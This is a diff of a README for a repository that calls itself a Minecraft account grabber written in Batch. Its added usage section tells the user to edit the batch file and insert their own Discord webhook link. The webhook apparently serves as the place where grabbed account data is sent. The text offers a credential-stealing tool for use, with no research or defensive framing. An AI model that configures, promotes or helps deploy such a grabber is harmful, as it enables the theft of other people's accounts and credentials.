dazd-pkz/minecraft-account-grabber/README.md

-# minecraft-account-grabber
-An Minecraft Account Grabber written in Batch
+# Minecraft Account Grabber

+Usage :
+Right Click on the batch file, select Modify, and replace the [WEBHOOK HERE WITHOUT BRACKETS] to your discord webhook link